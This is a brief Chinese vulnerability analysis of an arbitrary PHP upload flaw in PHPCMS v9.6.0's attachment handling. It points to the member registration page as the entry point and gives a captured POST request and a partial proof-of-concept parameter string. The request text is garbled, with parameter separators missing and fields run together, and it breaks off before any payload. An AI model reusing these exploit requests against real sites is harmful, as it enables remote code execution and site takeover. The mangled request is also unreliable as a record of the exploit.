PHPCMSv9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。
漏洞分析
前台注册页面处
/index.php?m=memberc=indexa=registersiteid=1
路径:/phpcms/modules/member/index.php
注册处抓包:
POST/phpcms/install_package/index.php?m=memberc=indexa=registersiteid=1HTTP/1.1siteid=1modelid=10username=password=pwdconfirm=email=%40qq. 11——>content内容
PoC:
siteid=1modelid=11username=NSdemonpassword=NSdemonpwdconfirm=email=NSdemon
qq.